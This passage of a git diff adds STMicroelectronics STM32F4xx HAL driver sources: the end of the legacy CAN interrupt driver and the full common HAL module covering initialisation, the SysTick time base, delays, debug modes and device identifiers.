+ { + /* Call receive function */ + CAN_Receive_IT(hcan, CAN_FIFO0); + } + + tmp1 = __HAL_CAN_MSG_PENDING(hcan, CAN_FIFO1); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_FMP1); + /* Check End of reception flag for FIFO1 */ + if((tmp1 != 0U) && tmp2) + { + /* Call receive function */ + CAN_Receive_IT(hcan, CAN_FIFO1); + } + + /* Set error code in handle */ + hcan->ErrorCode |= errorcode; + + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_EWG); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_EWG); + tmp3 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_ERR); + /* Check Error Warning Flag */ + if(tmp1 && tmp2 && tmp3) + { + /* Set CAN error code to EWG error */ + hcan->ErrorCode |= HAL_CAN_ERROR_EWG; + } + + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_EPV); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_EPV); + tmp3 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_ERR); + /* Check Error Passive Flag */ + if(tmp1 && tmp2 && tmp3) + { + /* Set CAN error code to EPV error */ + hcan->ErrorCode |= HAL_CAN_ERROR_EPV; + } + + tmp1 = __HAL_CAN_GET_FLAG(hcan, CAN_FLAG_BOF); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_BOF); + tmp3 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_ERR); + /* Check Bus-Off Flag */ + if(tmp1 && tmp2 && tmp3) + { + /* Set CAN error code to BOF error */ + hcan->ErrorCode |= HAL_CAN_ERROR_BOF; + } + + tmp1 = HAL_IS_BIT_CLR(hcan->Instance->ESR, CAN_ESR_LEC); + tmp2 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_LEC); + tmp3 = __HAL_CAN_GET_IT_SOURCE(hcan, CAN_IT_ERR); + /* Check Last error code Flag */ + if((!tmp1) && tmp2 && tmp3) + { + tmp1 = (hcan->Instance->ESR) & CAN_ESR_LEC; + switch(tmp1) + { + case(CAN_ESR_LEC_0): + /* Set CAN error code to STF error */ + hcan->ErrorCode |= HAL_CAN_ERROR_STF; + break; + case(CAN_ESR_LEC_1): + /* Set CAN error code to FOR error */ + hcan->ErrorCode |= HAL_CAN_ERROR_FOR; + break; + case(CAN_ESR_LEC_1 | CAN_ESR_LEC_0): + /* Set CAN error code to ACK error */ + hcan->ErrorCode |= HAL_CAN_ERROR_ACK; + break; + case(CAN_ESR_LEC_2): + /* Set CAN error code to BR error */ + hcan->ErrorCode |= HAL_CAN_ERROR_BR; + break; + case(CAN_ESR_LEC_2 | CAN_ESR_LEC_0): + /* Set CAN error code to BD error */ + hcan->ErrorCode |= HAL_CAN_ERROR_BD; + break; + case(CAN_ESR_LEC_2 | CAN_ESR_LEC_1): + /* Set CAN error code to CRC error */ + hcan->ErrorCode |= HAL_CAN_ERROR_CRC; + break; + default: + break; + } + + /* Clear Last error code Flag */ + hcan->Instance->ESR &= ~(CAN_ESR_LEC); + } + + /* Call the Error call Back in case of Errors */ + if(hcan->ErrorCode != HAL_CAN_ERROR_NONE) + { + /* Clear ERRI Flag */ + hcan->Instance->MSR = CAN_MSR_ERRI; + /* Set the CAN state ready to be able to start again the process */ + hcan->State = HAL_CAN_STATE_READY; + + /* Disable interrupts: */ + /* - Disable Error warning Interrupt */ + /* - Disable Error passive Interrupt */ + /* - Disable Bus-off Interrupt */ + /* - Disable Last error code Interrupt */ + /* - Disable Error Interrupt */ + /* - Disable FIFO 0 message pending Interrupt */ + /* - Disable FIFO 0 Overrun Interrupt */ + /* - Disable FIFO 1 message pending Interrupt */ + /* - Disable FIFO 1 Overrun Interrupt */ + /* - Disable Transmit mailbox empty Interrupt */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_EWG | + CAN_IT_EPV | + CAN_IT_BOF | + CAN_IT_LEC | + CAN_IT_ERR | + CAN_IT_FMP0| + CAN_IT_FOV0| + CAN_IT_FMP1| + CAN_IT_FOV1| + CAN_IT_TME); + + /* Call Error callback function */ + HAL_CAN_ErrorCallback(hcan); + } +} + +/** + * @brief Transmission complete callback in non blocking mode + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxCpltCallback(CAN_HandleTypeDef* hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Transmission complete callback in non blocking mode + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_RxCpltCallback(CAN_HandleTypeDef* hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Error CAN callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_ErrorCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group3 Peripheral State and Error functions + * @brief CAN Peripheral State functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Error functions ##### + ============================================================================== + [..] + This subsection provides functions allowing to : + (+) Check the CAN state. + (+) Check CAN Errors detected during interrupt process + +@endverbatim + * @{ + */ + +/** + * @brief return the CAN state + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL state + */ +HAL_CAN_StateTypeDef HAL_CAN_GetState(CAN_HandleTypeDef* hcan) +{ + /* Return CAN state */ + return hcan->State; +} + +/** + * @brief Return the CAN error code + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval CAN Error Code + */ +uint32_t HAL_CAN_GetError(CAN_HandleTypeDef *hcan) +{ + return hcan->ErrorCode; +} + +/** + * @} + */ +/** + * @brief Initiates and transmits a CAN frame message. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval HAL status + */ +static HAL_StatusTypeDef CAN_Transmit_IT(CAN_HandleTypeDef* hcan) +{ + /* Disable Transmit mailbox empty Interrupt */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_TME); + + if(hcan->State == HAL_CAN_STATE_BUSY_TX) + { + /* Disable Error warning, Error passive, Bus-off, Last error code + and Error Interrupts */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_EWG | + CAN_IT_EPV | + CAN_IT_BOF | + CAN_IT_LEC | + CAN_IT_ERR ); + } + + /* Change CAN state */ + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0_RX1; + break; + default: /* HAL_CAN_STATE_BUSY_TX */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + + /* Transmission complete callback */ + HAL_CAN_TxCpltCallback(hcan); + + return HAL_OK; +} + +/** + * @brief Receives a correct CAN frame. + * @param hcan Pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param FIFONumber Specify the FIFO number + * @retval HAL status + * @retval None + */ +static HAL_StatusTypeDef CAN_Receive_IT(CAN_HandleTypeDef* hcan, uint8_t FIFONumber) +{ + uint32_t tmp1 = 0U; + CanRxMsgTypeDef* pRxMsg = NULL; + + /* Set RxMsg pointer */ + if(FIFONumber == CAN_FIFO0) + { + pRxMsg = hcan->pRxMsg; + } + else /* FIFONumber == CAN_FIFO1 */ + { + pRxMsg = hcan->pRx1Msg; + } + + /* Get the Id */ + pRxMsg->IDE = (uint8_t)0x04 & hcan->Instance->sFIFOMailBox[FIFONumber].RIR; + if (pRxMsg->IDE == CAN_ID_STD) + { + pRxMsg->StdId = 0x000007FFU & (hcan->Instance->sFIFOMailBox[FIFONumber].RIR >> 21U); + } + else + { + pRxMsg->ExtId = 0x1FFFFFFFU & (hcan->Instance->sFIFOMailBox[FIFONumber].RIR >> 3U); + } + + pRxMsg->RTR = (uint8_t)0x02 & hcan->Instance->sFIFOMailBox[FIFONumber].RIR; + /* Get the DLC */ + pRxMsg->DLC = (uint8_t)0x0F & hcan->Instance->sFIFOMailBox[FIFONumber].RDTR; + /* Get the FIFONumber */ + pRxMsg->FIFONumber = FIFONumber; + /* Get the FMI */ + pRxMsg->FMI = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDTR >> 8U); + /* Get the data field */ + pRxMsg->Data[0] = (uint8_t)0xFF & hcan->Instance->sFIFOMailBox[FIFONumber].RDLR; + pRxMsg->Data[1] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 8U); + pRxMsg->Data[2] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 16U); + pRxMsg->Data[3] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDLR >> 24U); + pRxMsg->Data[4] = (uint8_t)0xFF & hcan->Instance->sFIFOMailBox[FIFONumber].RDHR; + pRxMsg->Data[5] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 8U); + pRxMsg->Data[6] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 16U); + pRxMsg->Data[7] = (uint8_t)0xFF & (hcan->Instance->sFIFOMailBox[FIFONumber].RDHR >> 24U); + /* Release the FIFO */ + /* Release FIFO0 */ + if (FIFONumber == CAN_FIFO0) + { + __HAL_CAN_FIFO_RELEASE(hcan, CAN_FIFO0); + + /* Disable FIFO 0 overrun and message pending Interrupt */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_FOV0 | CAN_IT_FMP0); + } + /* Release FIFO1 */ + else /* FIFONumber == CAN_FIFO1 */ + { + __HAL_CAN_FIFO_RELEASE(hcan, CAN_FIFO1); + + /* Disable FIFO 1 overrun and message pending Interrupt */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_FOV1 | CAN_IT_FMP1); + } + + tmp1 = hcan->State; + if((tmp1 == HAL_CAN_STATE_BUSY_RX0) || (tmp1 == HAL_CAN_STATE_BUSY_RX1)) + { + /* Disable Error warning, Error passive, Bus-off, Last error code + and Error Interrupts */ + __HAL_CAN_DISABLE_IT(hcan, CAN_IT_EWG | + CAN_IT_EPV | + CAN_IT_BOF | + CAN_IT_LEC | + CAN_IT_ERR); + } + + /* Change CAN state */ + if (FIFONumber == CAN_FIFO0) + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX0): + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX1; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX1; + break; + default: /* HAL_CAN_STATE_BUSY_RX0 */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + } + else /* FIFONumber == CAN_FIFO1 */ + { + switch(hcan->State) + { + case(HAL_CAN_STATE_BUSY_TX_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX; + break; + case(HAL_CAN_STATE_BUSY_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_RX0; + break; + case(HAL_CAN_STATE_BUSY_TX_RX0_RX1): + hcan->State = HAL_CAN_STATE_BUSY_TX_RX0; + break; + default: /* HAL_CAN_STATE_BUSY_RX1 */ + hcan->State = HAL_CAN_STATE_READY; + break; + } + } + + /* Receive complete callback */ + HAL_CAN_RxCpltCallback(hcan); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F427xx || STM32F437xx ||\ + STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx || STM32F412Zx ||\ + STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ + +#endif /* HAL_CAN_LEGACY_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal.c new file mode 100644 index 000000000..d0afdd373 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal.c @@ -0,0 +1,615 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal.c + * @author MCD Application Team + * @brief HAL module driver. + * This is the common part of the HAL initialization + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The common HAL driver contains a set of generic and common APIs that can be + used by the PPP peripheral drivers and the user to start using the HAL. + [..] + The HAL contains two APIs' categories: + (+) Common HAL APIs + (+) Services HAL APIs + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup HAL HAL + * @brief HAL module driver. + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup HAL_Private_Constants + * @{ + */ +/** + * @brief STM32F4xx HAL Driver version number V1.7.13 + */ +#define __STM32F4xx_HAL_VERSION_MAIN (0x01U) /*!< [31:24] main version */ +#define __STM32F4xx_HAL_VERSION_SUB1 (0x07U) /*!< [23:16] sub1 version */ +#define __STM32F4xx_HAL_VERSION_SUB2 (0x0DU) /*!< [15:8] sub2 version */ +#define __STM32F4xx_HAL_VERSION_RC (0x00U) /*!< [7:0] release candidate */ +#define __STM32F4xx_HAL_VERSION ((__STM32F4xx_HAL_VERSION_MAIN << 24U)\ + |(__STM32F4xx_HAL_VERSION_SUB1 << 16U)\ + |(__STM32F4xx_HAL_VERSION_SUB2 << 8U )\ + |(__STM32F4xx_HAL_VERSION_RC)) + +#define IDCODE_DEVID_MASK 0x00000FFFU + +/* ------------ RCC registers bit address in the alias region ----------- */ +#define SYSCFG_OFFSET (SYSCFG_BASE - PERIPH_BASE) +/* --- MEMRMP Register ---*/ +/* Alias word address of UFB_MODE bit */ +#define MEMRMP_OFFSET SYSCFG_OFFSET +#define UFB_MODE_BIT_NUMBER SYSCFG_MEMRMP_UFB_MODE_Pos +#define UFB_MODE_BB (uint32_t)(PERIPH_BB_BASE + (MEMRMP_OFFSET * 32U) + (UFB_MODE_BIT_NUMBER * 4U)) + +/* --- CMPCR Register ---*/ +/* Alias word address of CMP_PD bit */ +#define CMPCR_OFFSET (SYSCFG_OFFSET + 0x20U) +#define CMP_PD_BIT_NUMBER SYSCFG_CMPCR_CMP_PD_Pos +#define CMPCR_CMP_PD_BB (uint32_t)(PERIPH_BB_BASE + (CMPCR_OFFSET * 32U) + (CMP_PD_BIT_NUMBER * 4U)) + +/* --- MCHDLYCR Register ---*/ +/* Alias word address of BSCKSEL bit */ +#define MCHDLYCR_OFFSET (SYSCFG_OFFSET + 0x30U) +#define BSCKSEL_BIT_NUMBER SYSCFG_MCHDLYCR_BSCKSEL_Pos +#define MCHDLYCR_BSCKSEL_BB (uint32_t)(PERIPH_BB_BASE + (MCHDLYCR_OFFSET * 32U) + (BSCKSEL_BIT_NUMBER * 4U)) +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @addtogroup HAL_Private_Variables + * @{ + */ +__IO uint32_t uwTick; +uint32_t uwTickPrio = (1UL << __NVIC_PRIO_BITS); /* Invalid PRIO */ +HAL_TickFreqTypeDef uwTickFreq = HAL_TICK_FREQ_DEFAULT; /* 1KHz */ +/** + * @} + */ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup HAL_Exported_Functions HAL Exported Functions + * @{ + */ + +/** @defgroup HAL_Exported_Functions_Group1 Initialization and de-initialization Functions + * @brief Initialization and de-initialization functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initializes the Flash interface the NVIC allocation and initial clock + configuration. It initializes the systick also when timeout is needed + and the backup domain when enabled. + (+) De-Initializes common part of the HAL. + (+) Configure the time base source to have 1ms time base with a dedicated + Tick interrupt priority. + (++) SysTick timer is used by default as source of time base, but user + can eventually implement his proper time base source (a general purpose + timer for example or other time source), keeping in mind that Time base + duration should be kept 1ms since PPP_TIMEOUT_VALUEs are defined and + handled in milliseconds basis. + (++) Time base configuration function (HAL_InitTick ()) is called automatically + at the beginning of the program after reset by HAL_Init() or at any time + when clock is configured, by HAL_RCC_ClockConfig(). + (++) Source of time base is configured to generate interrupts at regular + time intervals. Care must be taken if HAL_Delay() is called from a + peripheral ISR process, the Tick interrupt line must have higher priority + (numerically lower) than the peripheral interrupt. Otherwise the caller + ISR process will be blocked. + (++) functions affecting time base configurations are declared as __weak + to make override possible in case of other implementations in user file. +@endverbatim + * @{ + */ + +/** + * @brief This function is used to initialize the HAL Library; it must be the first + * instruction to be executed in the main program (before to call any other + * HAL function), it performs the following: + * Configure the Flash prefetch, instruction and Data caches. + * Configures the SysTick to generate an interrupt each 1 millisecond, + * which is clocked by the HSI (at this stage, the clock is not yet + * configured and thus the system is running from the internal HSI at 16 MHz). + * Set NVIC Group Priority to 4. + * Calls the HAL_MspInit() callback function defined in user file + * "stm32f4xx_hal_msp.c" to do the global low level hardware initialization + * + * @note SysTick is used as time base for the HAL_Delay() function, the application + * need to ensure that the SysTick time base is always set to 1 millisecond + * to have correct HAL operation. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_Init(void) +{ + /* Configure Flash prefetch, Instruction cache, Data cache */ +#if (INSTRUCTION_CACHE_ENABLE != 0U) + __HAL_FLASH_INSTRUCTION_CACHE_ENABLE(); +#endif /* INSTRUCTION_CACHE_ENABLE */ + +#if (DATA_CACHE_ENABLE != 0U) + __HAL_FLASH_DATA_CACHE_ENABLE(); +#endif /* DATA_CACHE_ENABLE */ + +#if (PREFETCH_ENABLE != 0U) + __HAL_FLASH_PREFETCH_BUFFER_ENABLE(); +#endif /* PREFETCH_ENABLE */ + + /* Set Interrupt Group Priority */ + HAL_NVIC_SetPriorityGrouping(NVIC_PRIORITYGROUP_4); + + /* Use systick as time base source and configure 1ms tick (default clock after Reset is HSI) */ + HAL_InitTick(TICK_INT_PRIORITY); + + /* Init the low level hardware */ + HAL_MspInit(); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief This function de-Initializes common part of the HAL and stops the systick. + * This function is optional. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DeInit(void) +{ + /* Reset of all peripherals */ + __HAL_RCC_APB1_FORCE_RESET(); + __HAL_RCC_APB1_RELEASE_RESET(); + + __HAL_RCC_APB2_FORCE_RESET(); + __HAL_RCC_APB2_RELEASE_RESET(); + + __HAL_RCC_AHB1_FORCE_RESET(); + __HAL_RCC_AHB1_RELEASE_RESET(); + + __HAL_RCC_AHB2_FORCE_RESET(); + __HAL_RCC_AHB2_RELEASE_RESET(); + + __HAL_RCC_AHB3_FORCE_RESET(); + __HAL_RCC_AHB3_RELEASE_RESET(); + + /* De-Init the low level hardware */ + HAL_MspDeInit(); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Initialize the MSP. + * @retval None + */ +__weak void HAL_MspInit(void) +{ + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes the MSP. + * @retval None + */ +__weak void HAL_MspDeInit(void) +{ + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief This function configures the source of the time base. + * The time source is configured to have 1ms time base with a dedicated + * Tick interrupt priority. + * @note This function is called automatically at the beginning of program after + * reset by HAL_Init() or at any time when clock is reconfigured by HAL_RCC_ClockConfig(). + * @note In the default implementation, SysTick timer is the source of time base. + * It is used to generate interrupts at regular time intervals. + * Care must be taken if HAL_Delay() is called from a peripheral ISR process, + * The SysTick interrupt must have higher priority (numerically lower) + * than the peripheral interrupt. Otherwise the caller ISR process will be blocked. + * The function is declared as __weak to be overwritten in case of other + * implementation in user file. + * @param TickPriority Tick interrupt priority. + * @retval HAL status + */ +__weak HAL_StatusTypeDef HAL_InitTick(uint32_t TickPriority) +{ + /* Configure the SysTick to have interrupt in 1ms time basis*/ + if (HAL_SYSTICK_Config(SystemCoreClock / (1000U / uwTickFreq)) > 0U) + { + return HAL_ERROR; + } + + /* Configure the SysTick IRQ priority */ + if (TickPriority < (1UL << __NVIC_PRIO_BITS)) + { + HAL_NVIC_SetPriority(SysTick_IRQn, TickPriority, 0U); + uwTickPrio = TickPriority; + } + else + { + return HAL_ERROR; + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup HAL_Exported_Functions_Group2 HAL Control functions + * @brief HAL Control functions + * +@verbatim + =============================================================================== + ##### HAL Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Provide a tick value in millisecond + (+) Provide a blocking delay in millisecond + (+) Suspend the time base source interrupt + (+) Resume the time base source interrupt + (+) Get the HAL API driver version + (+) Get the device identifier + (+) Get the device revision identifier + (+) Enable/Disable Debug module during SLEEP mode + (+) Enable/Disable Debug module during STOP mode + (+) Enable/Disable Debug module during STANDBY mode + +@endverbatim + * @{ + */ + +/** + * @brief This function is called to increment a global variable "uwTick" + * used as application time base. + * @note In the default implementation, this variable is incremented each 1ms + * in SysTick ISR. + * @note This function is declared as __weak to be overwritten in case of other + * implementations in user file. + * @retval None + */ +__weak void HAL_IncTick(void) +{ + uwTick += uwTickFreq; +} + +/** + * @brief Provides a tick value in millisecond. + * @note This function is declared as __weak to be overwritten in case of other + * implementations in user file. + * @retval tick value + */ +__weak uint32_t HAL_GetTick(void) +{ + return uwTick; +} + +/** + * @brief This function returns a tick priority. + * @retval tick priority + */ +uint32_t HAL_GetTickPrio(void) +{ + return uwTickPrio; +} + +/** + * @brief Set new tick Freq. + * @retval Status + */ +HAL_StatusTypeDef HAL_SetTickFreq(HAL_TickFreqTypeDef Freq) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_TickFreqTypeDef prevTickFreq; + + assert_param(IS_TICKFREQ(Freq)); + + if (uwTickFreq != Freq) + { + /* Back up uwTickFreq frequency */ + prevTickFreq = uwTickFreq; + + /* Update uwTickFreq global variable used by HAL_InitTick() */ + uwTickFreq = Freq; + + /* Apply the new tick Freq */ + status = HAL_InitTick(uwTickPrio); + + if (status != HAL_OK) + { + /* Restore previous tick frequency */ + uwTickFreq = prevTickFreq; + } + } + + return status; +} + +/** + * @brief Return tick frequency. + * @retval tick period in Hz + */ +HAL_TickFreqTypeDef HAL_GetTickFreq(void) +{ + return uwTickFreq; +} + +/** + * @brief This function provides minimum delay (in milliseconds) based + * on variable incremented. + * @note In the default implementation , SysTick timer is the source of time base. + * It is used to generate interrupts at regular time intervals where uwTick + * is incremented. + * @note This function is declared as __weak to be overwritten in case of other + * implementations in user file. + * @param Delay specifies the delay time length, in milliseconds. + * @retval None + */ +__weak void HAL_Delay(uint32_t Delay) +{ + uint32_t tickstart = HAL_GetTick(); + uint32_t wait = Delay; + + /* Add a freq to guarantee minimum wait */ + if (wait < HAL_MAX_DELAY) + { + wait += (uint32_t)(uwTickFreq); + } + + while((HAL_GetTick() - tickstart) < wait) + { + } +} + +/** + * @brief Suspend Tick increment. + * @note In the default implementation , SysTick timer is the source of time base. It is + * used to generate interrupts at regular time intervals. Once HAL_SuspendTick() + * is called, the SysTick interrupt will be disabled and so Tick increment + * is suspended. + * @note This function is declared as __weak to be overwritten in case of other + * implementations in user file. + * @retval None + */ +__weak void HAL_SuspendTick(void) +{ + /* Disable SysTick Interrupt */ + SysTick->CTRL &= ~SysTick_CTRL_TICKINT_Msk; +} + +/** + * @brief Resume Tick increment. + * @note In the default implementation , SysTick timer is the source of time base. It is + * used to generate interrupts at regular time intervals. Once HAL_ResumeTick() + * is called, the SysTick interrupt will be enabled and so Tick increment + * is resumed. + * @note This function is declared as __weak to be overwritten in case of other + * implementations in user file. + * @retval None + */ +__weak void HAL_ResumeTick(void) +{ + /* Enable SysTick Interrupt */ + SysTick->CTRL |= SysTick_CTRL_TICKINT_Msk; +} + +/** + * @brief Returns the HAL revision + * @retval version : 0xXYZR (8bits for each decimal, R for RC) + */ +uint32_t HAL_GetHalVersion(void) +{ + return __STM32F4xx_HAL_VERSION; +} + +/** + * @brief Returns the device revision identifier. + * @retval Device revision identifier + */ +uint32_t HAL_GetREVID(void) +{ + return((DBGMCU->IDCODE) >> 16U); +} + +/** + * @brief Returns the device identifier. + * @retval Device identifier + */ +uint32_t HAL_GetDEVID(void) +{ + return((DBGMCU->IDCODE) & IDCODE_DEVID_MASK); +} + +/** + * @brief Enable the Debug Module during SLEEP mode + * @retval None + */ +void HAL_DBGMCU_EnableDBGSleepMode(void) +{ + SET_BIT(DBGMCU->CR, DBGMCU_CR_DBG_SLEEP); +} + +/** + * @brief Disable the Debug Module during SLEEP mode + * @retval None + */ +void HAL_DBGMCU_DisableDBGSleepMode(void) +{ + CLEAR_BIT(DBGMCU->CR, DBGMCU_CR_DBG_SLEEP); +} + +/** + * @brief Enable the Debug Module during STOP mode + * @retval None + */ +void HAL_DBGMCU_EnableDBGStopMode(void) +{ + SET_BIT(DBGMCU->CR, DBGMCU_CR_DBG_STOP); +} + +/** + * @brief Disable the Debug Module during STOP mode + * @retval None + */ +void HAL_DBGMCU_DisableDBGStopMode(void) +{ + CLEAR_BIT(DBGMCU->CR, DBGMCU_CR_DBG_STOP); +} + +/** + * @brief Enable the Debug Module during STANDBY mode + * @retval None + */ +void HAL_DBGMCU_EnableDBGStandbyMode(void) +{ + SET_BIT(DBGMCU->CR, DBGMCU_CR_DBG_STANDBY); +} + +/** + * @brief Disable the Debug Module during STANDBY mode + * @retval None + */ +void HAL_DBGMCU_DisableDBGStandbyMode(void) +{ + CLEAR_BIT(DBGMCU->CR, DBGMCU_CR_DBG_STANDBY); +} + +/** + * @brief Enables the I/O Compensation Cell. + * @note The I/O compensation cell can be used only when the device supply + * voltage ranges from 2.4 to 3.6 V. + * @retval None + */ +void HAL_EnableCompensationCell(void) +{ + *(__IO uint32_t *)CMPCR_CMP_PD_BB = (uint32_t)ENABLE; +} + +/** + * @brief Power-down the I/O Compensation Cell. + * @note The I/O compensation cell can be used only when the device supply + * voltage ranges from 2.4 to 3.6 V. + * @retval None + */ +void HAL_DisableCompensationCell(void) +{ + *(__IO uint32_t *)CMPCR_CMP_PD_BB = (uint32_t)DISABLE; +} + +/** + * @brief Returns first word of the unique device identifier (UID based on 96 bits) + * @retval Device identifier + */ +uint32_t HAL_GetUIDw0(void) +{ + return (READ_REG(*((uint32_t *)UID_BASE))); +} + +/** + * @brief Returns second word of the unique device identifier (UID based on 96 bits) + * @retval Device identifier + */ +uint32_t HAL_GetUIDw1(void) +{ + return (READ_REG(*((uint32_t *)(UID_BASE + 4U)))); +} + +/** + * @brief Returns third word of the unique device identifier (UID based on 96 bits) + * @retval Device identifier + */ +uint32_t HAL_GetUIDw2(void) +{ + return (READ_REG(*((uint32_t *)(UID_BASE + 8U)))); +} + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx)|| defined(STM32F439xx) ||\ + defined(STM32F469xx) || defined(STM32F479xx) +/** + * @brief Enables the Internal FLASH Bank Swapping. + * + * @note This function can be used only for STM32F42xxx/43xxx/469xx/479xx devices. + * + * @note Flash Bank2 mapped at 0x08000000 (and aliased @0x00000000) + * and Flash Bank1 mapped at 0x08100000 (and aliased at 0x00100000) + * + * @retval None + */ +void HAL_EnableMemorySwappingBank(void) +{ + *(__IO uint32_t *)UFB_MODE_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables the Internal FLASH Bank Swapping. + * + * @note This function can be used only for STM32F42xxx/43xxx/469xx/479xx devices. + * + * @note The default state : Flash Bank1 mapped at 0x08000000 (and aliased @0x00000000) + * and Flash Bank2 mapped at 0x08100000 (and aliased at 0x00100000) + * + * @retval None + */ +void HAL_DisableMemorySwappingBank(void) +{ + *(__IO uint32_t *)UFB_MODE_BB = (uint32_t)DISABLE; +} +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_adc.c new file mode 100644 index 000000000..cf3df802b --- /dev/null +++ 